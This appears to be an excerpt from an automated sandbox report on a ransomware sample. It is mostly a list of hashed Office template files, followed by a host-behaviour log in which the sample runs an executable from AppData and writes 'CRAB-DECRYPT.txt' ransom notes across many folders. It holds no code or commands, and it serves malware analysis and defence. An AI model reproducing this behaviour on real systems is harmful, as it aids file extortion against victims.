SHA1: 24437f20e0bb9c77326cb6b08ff67de466ab1795
SHA256: 2c65398b797782dbda743edf269d5ee1a24540b65437d37896ae435af8413bd1 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03090434[[fn=wood type]].thmx 1.57 MB MD5: c1587dbe39c33e5bbbe5baad4186f86c
SHA1: 4785766c81ee062924ebdc9086971fdfadef8fba
SHA256: 38aa5633e615b85cb386d7e860b02414e5a32f28e0decc73c90d6f85e8eb97d1 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457444[[fn=basis]].thmx 545.48 KB MD5: 9e11fde89f689aa45e7f07013490b150
SHA1: 95f7f286411b5a11bdb3833932a315bf0fe0b678
SHA256: 224f658a958eadff784baea8710f1849017b31d1a75eb0b377b701e64baead51 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457464[[fn=dividend]].thmx 558.05 KB MD5: 76051fa29994c47ed57de1bb58d1ff6c
SHA1: 3d84055384400a9b11d045b127b9fe17d343347e
SHA256: 4d3c3b324b7cad1ad828ce043f1b1d7ee376ad673673d49df58d451dc05752d5 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457475[[fn=frame]].thmx 511.31 KB MD5: b8a5cd8176c89adc3a4a2193363e526b
SHA1: 89900d82dd654072ab503cfde4eaeb40509728ec
SHA256: 9c68e2acd9e948583e47cbfce132330279e89f256786b8842b7f6ca8c3044f14 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457485[[fn=mesh]].thmx 2.94 MB MD5: f32b086c758f97a8a0bb563ee69e4b63
SHA1: 1d409d3907633a2e27bcc17d4c48a7f1eb781f71
SHA256: 6b6a783f9d5b827382a314e986ed85da31ced3b15f63d7612907ee457956a479 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457491[[fn=metropolitan]].thmx 759.94 KB MD5: 3e8cae1f2393464a34304036dba60940
SHA1: d37c5d8ed5894482a76090989993436891bf6e3c
SHA256: fb624f682c47a2436917519ed5276fcfeb5fc1d47e2000d2170fc7e5372bf673 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457496[[fn=parallax]].thmx 903.53 KB MD5: d83998fdc7808e89dfe49d74095695ce
SHA1: d254449176173cf448bd35d5712a4d8b3aa6f477
SHA256: 1f5b9e9180c1c85f6618dc8ce67f5b4926b7f8a0f682434ad5979b8d7972ded2 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457503[[fn=quotable]].thmx 944.81 KB MD5: 2df1f26ee11ea5b50f80a441a9e731be
SHA1: 978732ff8c2cef5e3b5ca75b870fc64a50c10891
SHA256: 3bd8c57275a9e130e4ee82307266b8b03e478d13984807ca074f0d060d1718c9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457510[[fn=savon]].thmx 1.15 MB MD5: 75ca266e3f3744d3fa062938118a607e
SHA1: 5d699a89ef8627a1fed8b69c72a329ce2ce3e28d
SHA256: 7573db225fed45775ef359c2af5092cdaa0ece59cc0c2bb373c1e7b46ecdf990 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457515[[fn=view]].thmx 475.72 KB MD5: ea3ce48fb687aed6551a5a06374da0f1
SHA1: cc603efec870ecec299af84ac10ee3a214db3374
SHA256: 33bee6160e3856a28b21d054286efcadc93641945eb98433cde11c226e0684c1 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033917[[fn=berlin]].thmx 953.66 KB MD5: 8a820622207844e096523f1393cdae03
SHA1: 14a9aa68d0f51c6f2e92c6ccbe4ee9e06a727cdb
SHA256: 8cafd429239e4a4249f961da17f8e10699406f1ed7a719dcb99f9d8b926248d7 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033919[[fn=circuit]].thmx 1.40 MB MD5: 4199138446736e1d694428c3eeae187d
SHA1: b476989fd42a8126cf61821b66147753a4567de6
SHA256: f85935c1c1a7e3594d542f1dfba95941e361fb10edfafe753e6b7dbadbe8b2d2 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033921[[fn=damask]].thmx 2.12 MB MD5: 334003e3df3ca09c1540157cd4158114
SHA1: ae1490e95ee5061599003a39fc724f4d4fd604c2
SHA256: e742b597c04f5484202e8d7854bd777f16c96e98241a3cc00ae89a4a1c64624c 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033925[[fn=droplet]].thmx 1.67 MB MD5: 34efa048b3ea9ebd0f9a1b2f1f37cd85
SHA1: 02950b2a44a2972b2d69afdc266bf50fef730ad9
SHA256: 4d223b5e94dab1176ac233043fd51750064212940d265b99e3c439ef5c516711 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033927[[fn=main event]].thmx 2.79 MB MD5: 71e673229d545afcd21d0e9eabff13e4
SHA1: 98ba76cba61fddc2f606443df931f07255c3223f
SHA256: 8e1b79a3213495106d1eb8192f083c7860378d49b6056a478aa84b0401ce184e 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033929[[fn=slate]].thmx 2.25 MB MD5: 140c122d2ab26e66817b466057e3e2cd
SHA1: 3cc83dff9bf971c5e6998ae560e4a953af99a788
SHA256: 7d7005ccc956843608a7769e6dabfa4bf8d5daa3d1be1406ff48cabfccd1a0f1 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033937[[fn=vapor trail]].thmx 3.44 MB MD5: 6caabb81f15acdbe301f98beaa14ddd6
SHA1: 5b12a4305f7c414f41896ca2f9eabbfeb7a14472
SHA256: d21c0832a97db8966be533ffe1b3e40310a23c5de9f7cfbda389357bc0be7f8b 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001103[[fn=headlines]].thmx 527.48 KB MD5: 77772fdda18533fb399d31a79b5bd41e
SHA1: 93c58461bbadf31716de1c0664c4c4e617cf7e85
SHA256: 0ffc7ee508c3fbf97a3e797ca314e5170049315a560cee0a11b4040d84bc45ef 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001104[[fn=feathered]].thmx 1.96 MB MD5: 13d3b94fc0d7f2c3f6bf1af906f3de06
SHA1: 9a7ab73c4fbd36429ee0ec30b72be0de0639f6c7
SHA256: 187f252095ef5fd6c4635efc0d37e8e4cbe672cfa6b0ebfc07568427e6c641ee 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001105[[fn=crop]].thmx 524.55 KB MD5: a658ab33e435b66271ff2735070bc1ae
SHA1: 3bf521890aedc02e37ce1ae90156e6cc5a3d2675
SHA256: 098370223da5fe1d7e241a5572cf485d3ffa525622241c67b655eafe55fcb5d6 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001114[[fn=gallery]].thmx 1.04 MB MD5: 0e137e1a97d9ece35730a1bcc5c725e4
SHA1: 091f9b513026a523221524ba9c647866334ab79e
SHA256: cef0ceb911413c1d37ed2bb2dca1843bca1270ee45852b2d0e100358de6982e5 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001115[[fn=parcel]].thmx 594.39 KB MD5: aae7bfa272d494f8a82fb221e38c6152
SHA1: bb22016a715ba32cf1bb3855d15daad070ebee11
SHA256: 4e1c176116fd1c184456cbc72f5a9ae28ac423b7b766f54c02e99505137b5230 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm16401371[[fn=atlas]].thmx 838.08 KB MD5: 089003123a93a54095b84c782d64cc0d
SHA1: f052a9cbb0bfc268d99eb2460563b52a9b8c454f
SHA256: 12f1e3598c7bea2668f7fcf6e28401c14b71996cf821d494e93ba39240a1013f 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328884[[fn=architecture]].glox 6.17 KB MD5: c8ccb0a33a1e89dbae2b8a2c80dfbb54
SHA1: 49c842e354f3f3e945d4cc9c63cb76123911d05d
SHA256: ba0f111a8bfb4b89e0e14e2a311ba0373f347f8885c48b5515550053b0c719e9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328893[[fn=bracketlist]].glox 4.45 KB MD5: ac89297bf30514673fe1965b317310f8
SHA1: c599ede6b5c90303e53edd11452da9af15b1749d
SHA256: 566af0bc0d7c2537f74cb82bd8b1d261329c1828cc9af022f930bde043502424 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328905[[fn=chevron accent]].glox 4.67 KB MD5: ee0ad0d74bc343bb765993d1e1927715
SHA1: 0413b48c305fb886df035054555a734d90cd5712
SHA256: dc41363805e06bf8192b53d2874b5bcbf673b784c6ecbbc2a41a717152e0f3d0 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328908[[fn=circle process]].glox 16.94 KB MD5: c73c05a2b3d08f3c835e46022e6a0995
SHA1: 01fad837e31568dd910860ca806513d060c22ab4
SHA256: b9dcd3cbc5850bd8cd3dca901035e17c037194f787db7ea23c191bde84a3dbf6 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328916[[fn=converging text]].glox 11.64 KB MD5: 8d05ce5a1d952e77a66b7745521c9a4e
SHA1: 7a724bfa431318a9f2c5e1a5053e94d5374fd0d5
SHA256: d5dff5e3ebb526a3bc72bd6e842269a55ec3bbf222f3dcbda6e659a4b5b83ad3 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328919[[fn=hexagon radial]].glox 6.41 KB MD5: 8c99449400a45e9860609fb3ed01c5d2
SHA1: f0b667e7c29495a3b28fea23ea0cb11e72312288
SHA256: 16c30fde40e946ea1533e2b31b7de34d039b375abf93b3e25ec33b726b2b94c5 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328925[[fn=interconnected block process]].glox 9.50 KB MD5: b95e65f7df800345595d282671783967
SHA1: 2d6593fab6565a1b77a87e298e55fa3cd5e82907
SHA256: 659b1be0f0e31374485765126ca102fcef1dac8a742b54993e64e9192486991d 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328932[[fn=picture frame]].glox 4.75 KB MD5: ed2268e6b7d03e19b10bc51cbe48dfee
SHA1: 6be77f4cd704e4322d8371413bd4eb5ac4a8ee88
SHA256: 8b80d60311bdf13af368abc18be54f1e4d02e51ba2561c6f6ffcd5d724f0228d 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328935[[fn=picture organization chart]].glox 7.72 KB MD5: 8b843a80f395b6d6c95278f33d963dc2
SHA1: 9c6e8529d59af49bc428eb27fb1884413d95c052
SHA256: 7705434148324bb8554deee1b4546563653933962f8e75ca070ae641073607f7 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328940[[fn=radial picture list]].glox 5.98 KB MD5: 53a3b1d5f08fc78d58f7a329b24c12f0
SHA1: 2aa4a8e306629ccde7bee321602fc2d3d6b1d055
SHA256: c5d06fab058d226bc0c7f01b404fa0e9f1bdcf602ee5c8ec0629d39e99eda707 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328951[[fn=tabbed arc]].glox 4.12 KB MD5: 7e32ad78273a5800adcbac60ed9086a1
SHA1: 0a020eb56ab0b3de706b6e7d5af9beb7aaa03690
SHA256: dd80735eba4ded6b972e6b1c55b177efe94b326e8dd06698ff3748365eab2fb5 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328972[[fn=tab list]].glox 5.30 KB MD5: c3d72112eda09f922641157694a0e612
SHA1: 50511a09958d40049549fefe2bd5c5b975616bfe
SHA256: 4e8e5ac549866c26c81e947952a3ed965bd5f0d6e4092b18fe2de37f5940d240 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328975[[fn=theme picture accent]].glox 6.81 KB MD5: bb2d0dc89e3924acd43385d5249aa377
SHA1: ac603d8e4aa8bc5c79bda9b07bdcdea2ff93d918
SHA256: 8219e86680e9d0264519035febab5c01c80590cc1fd474e678e372114a252280 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328983[[fn=theme picture alternating accent]].glox 6.02 KB MD5: 3a5287118dcdce143e892c08edb5f41e
SHA1: b6d77ac878cdcf6dc65a48ce5942429eb7aa4901
SHA256: 3d0c69b04acdfe8095fb2da534d655b90e6963c85d3c7f0c1d6a79cf905eb100 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328986[[fn=theme picture grid]].glox 6.58 KB MD5: 8d080a225a342e59d2e903077cd8ade2
SHA1: 8ff8379435f7cd191fe5ed7a2e3a2609293af53f
SHA256: 6e67cf55d3dea09524b4a8e392d25ebab6d61ac6bb83d6a151bfe42174707b26 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328990[[fn=varying width list]].glox 3.53 KB MD5: 00083f810194ec80949ea2b015deb10a
SHA1: 8c05ef9d80129a24c205b88f59d3c1ff7c460597
SHA256: 01715d366fa966d99797f59fa1f915d63882bc3eca9422ce1e6071fd57d11892 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328998[[fn=rings]].glox 5.55 KB MD5: 7b5463e779c711141bdb0aab95e6c291
SHA1: 31df7fa39a30c29bc7277132e3c015111e245f85
SHA256: 361e1f51dedfdc09067da71162bc5f157c6fbef0939389b471a2d8eae0fa501e 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851216[[fn=apasixtheditionofficeonline]].xsl 325.97 KB MD5: 3f7678f540f2feebf27d6ae9187ee201
SHA1: 7b37f9e01b0f6943b8b0f20543d86a2349dbf0f5
SHA256: 5230eee8d3b9babf936d7b07aaf5b6d4cf91e44ca6273c7eba80cd995997cca1 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851217[[fn=chicago]].xsl 290.23 KB MD5: 7c9bab85dc6f44b0680870236dc39797
SHA1: 6a4490193648de3a10a2651d4c0b7859d1ab7ca9
SHA256: 192ba13f790df8e2ddbf36abb23675c6538da6edc1e435701694aafd9e2461cb 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851218[[fn=gb]].xsl 262.55 KB MD5: 3813e117db4e799353de8276040b766f
SHA1: db184f39e76e62672814a03bb41d293141bbd2c1
SHA256: f92abd100dc162b2ba2d2a38f6611d1918c0a9aa9bd8cc6a819b94bfb8c9019e 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851219[[fn=gostname]].xsl 250.47 KB MD5: b1aa46c87dc394a091e2a55110200a9b
SHA1: 6f55b2afafeb26ae792e70c0e8cffaa372b60812
SHA256: 348ce98e1dfcfe6106cbc6ad1a57721d54b16d018b921cf5ac5888d64bd105e8 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851220[[fn=gosttitle]].xsl 245.67 KB MD5: f5eb849610408d7bc90b352a583c9429
SHA1: 1a6c2c0ef4c95b9a40669b89bc484871ebccd65d
SHA256: d38622af4b4854bd60ebf74778ccda9bf60f1948b88d4425f94a6d8349875513 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851221[[fn=harvardanglia2008officeonline]].xsl 278.27 KB MD5: 2ce52392f75c2a1c91bf934bc9abcfc7
SHA1: 9c01a309d640215edc93a67c6a2ced756dcb33e5
SHA256: 4f8945769454598b2deac94cc77fbe988a4dbc8a298ea4792478e5997f1d63e9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851222[[fn=ieee2006officeonline]].xsl 287.81 KB MD5: c318ee90423b931bd4cb146deeb53295
SHA1: c1381fe7719896a21d6b2ac340224728d28ef610
SHA256: 0d4099b710ed54a47a2ecda28a1cc0284c0230988fa46044471a107e9df4e184 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851223[[fn=iso690]].xsl 264.39 KB MD5: 51a4d4d28d7cc5a5eef8212bee0fa975
SHA1: e832d5deaeac4ecd43953a59c76aac9f924a504f
SHA256: c5ef49dee0bd8dd02e4c8bc0e3824b673a097a9fc7009fc562efb8df1aab03b9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851224[[fn=iso690nmerical]].xsl 212.58 KB MD5: 379d083a1602eee30923c25a8031a9d0
SHA1: c840d2751a91ec18b8666507e212f71fe49bfed6
SHA256: 9a94a549d2df12ea627b1e4eb19f92ccf17ff5fe7e830c2d33449904b45ab87f 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851225[[fn=mlaseventheditionofficeonline]].xsl 249.42 KB MD5: 4b2043e07bdf5596e6197487f9f40d34
SHA1: 8e62bffd6f0c95864f45b0b1babdb9cc4a2ee4fa
SHA256: 9b9bec6b49991d9a439ca510b1de52021cea0bb8960669ea22af4518c2b8f4ab 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851226[[fn=turabian]].xsl 336.75 KB MD5: 44062a35b792b4bf1e57e17a325058ee
SHA1: f7dd767a91869f10f978f2fc79d571df9ead2ad9
SHA256: 82ae22d960a05e49e6b310f9207cdd49d429cea525059bcefb08256bafb289f2 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851227[[fn=sist02]].xsl 245.62 KB MD5: be9be8e8185b1db91ee795e30c85f256
SHA1: 005003743237d086c1c3ee11fb86030bc314ab35
SHA256: 92c2d90539a79c193613f76edf4208c59c70adc5de101e0dc0ef21ac794bc2b8 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm01840907[[fn=equations]].dotx 51.14 KB MD5: c0f7cf1e3a872e16426d93beb364e06b
SHA1: 75b1316d4c8f93c7d49768e7b5e835c850985b3c
SHA256: bb4a654c0f191513789f4f013f1122b1cbaeac16dcdbef6d71a79f2de448f01a 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835231[[fn=text cover with toc (student report blue design)]].docx 60.73 KB MD5: b869abad1cb2199f2195b4b5ec4d462a
SHA1: 52098cf58ca2901d5a40d58dd59784d53213eeca
SHA256: 3f9e268bb8cd8d4d5190cda23992125947e255ac902b43c0e51418684ef9f492 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835232[[fn=text cover (student report blue design)]].docx 57.17 KB MD5: fa72bf3a655b4c5affc16a70a93bea15
SHA1: ccab411d9d9cd942d51c88b2f7cd91eda572c60c
SHA256: 8073145784513807066d12a4b5548c5f43bbd757078f96e1fd808dfe4a25bfc3 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835233[[fn=text sidebar (annual report red and black design)]].docx 46.70 KB MD5: 78e72cd292c5351eca5a8375a13457e6
SHA1: 2a3ed44e144636294684441b40f0036ae3820fa5
SHA256: 5af907563eba64470e8671bd0043a88a7bb0641215a7761d3e312d7b8f85e621 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835264[[fn=cover page (annual report red and black design)]].docx 58.22 KB MD5: e673fd9791f449b78ba95a84be2c3e45
SHA1: 49b1ff7ffa4a651dad8258802be372915ccb1245
SHA256: 23dced46bccd630948415d819aac4135629e178bedf6ff80785534f8ca5b1754 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835265[[fn=cover page (annual report timeless design)]].docx 57.66 KB MD5: 6e26733cbce8340543b8eb230088fef6
SHA1: 1e188f87bc4dec473b7756285fe29de238f4d931
SHA256: f52af90c611a18e2c8f51635d42bff50e4162ba1fd8da13f43962654942cf198 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835266[[fn=cover letter (chronological resume simple design)]].docx 56.11 KB MD5: 0e39b656e93e1f2d94474fc53ce861f4
SHA1: 5fa79a49ebcd3d308b475323afb1e8bdce0aa648
SHA256: 50c22d6a352e410ba7c7a735115ac3bff327158e7640659c3100e720d3726521 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835267[[fn=cover with logo (annual report red and black design)]].docx 62.42 KB MD5: 1256509515d9827654d834f1184d3f7a
SHA1: 6008657a375eb6430ea942b8fe5029a87b49564d
SHA256: 533091ded7c4fcaef3fae1b8032b61eb5991345dc27cc6146b12595ec8568277 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835268[[fn=photo cover (student report blue design)]].docx 314.64 KB MD5: 14b5315288999531d81f9314e7e34776
SHA1: f44a6a7ccd4ac23dfe6831816e3a12e2627c69c8
SHA256: d601b2996924f0f8fd2bcd3524b03bcaa4c18e35a7f018d75af8bca9c0ec4a1e 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835269[[fn=photo cover with toc (student report blue design)]].docx 307.30 KB MD5: eab6473a699d1159127435b25e8bc96c
SHA1: 6d98a3ce80d7e37ff2915d29315a5283d22472c7
SHA256: 243adc5ea466e188024d5c4fbd7efd2015d416af72f7c588122f9f0f1d3057ba 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835270[[fn=photo sidebar (annual report red and black design)]].docx 226.34 KB MD5: d53cd613cffabd7504960f313af39bfd
SHA1: cf82d8f7ed6e7d1f179a0372a8715ce2ea0781ab
SHA256: 37a0d1fd5249d3b46754cc02db73add8ef6633935f289c6f0d072c55e3ae31c6 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835271[[fn=sample table (annual report red and black design)]].docx 29.44 KB MD5: 25e86197f269606061e99c525b826b9d
SHA1: fb1fb02b7866d5d58e7863e39ac1fe52af7b4c1c
SHA256: 08e70e5b5086a7850624dd67a23db8546e9a014e3b84194cc143d9c6d4e75960 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835272[[fn=sample table (annual report timeless design)]].docx 44.88 KB MD5: 61388293531b46cd5f842f527b2f9c4f
SHA1: 7e6c8d8ee04c8bd786a38e503a833b087cb480ae
SHA256: fba55f3ce489ff3e3cfd43287a9c69c11d80c8480f0075dda9a0e517670455b0 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02836362[[fn=cover letter (resume timeless design)]].docx 50.31 KB MD5: 22854804b436b218cc99ab26875eb0a0
SHA1: 1b127643d3a961e45bdd3e0d27e7fa12462d8fbc
SHA256: 7bd6a51d444bdd7104c5ca3f528e03cc79e4c6c15d65c8158d7cef38669fe969 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm03998158[[fn=element]].dotx 34.12 KB MD5: 612b1dc58dbcfbfd17bfad854fb703f5
SHA1: 724806bfdeba99459533cb105f7444d23bd86283
SHA256: 950496b0baa7be92a9ebc70acf6e40b02ffe0ae7db72b674741fd97002dce3f0 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm03998159[[fn=insight]].dotx 2.10 MB MD5: be5b4996fd89147059141be0f4f7aaad
SHA1: d6d318d3d3b7585dda2417a77dc05928573c500d
SHA256: e03a9bb3500e1ebb9a09e27b3eb88784bf500357200bf38245364db6f267a7c0 		False
...
Host Behavior
File (1908)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\MSOCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\PerfLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Recovery\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\System Volume Information\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\ggNuzUYFd.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
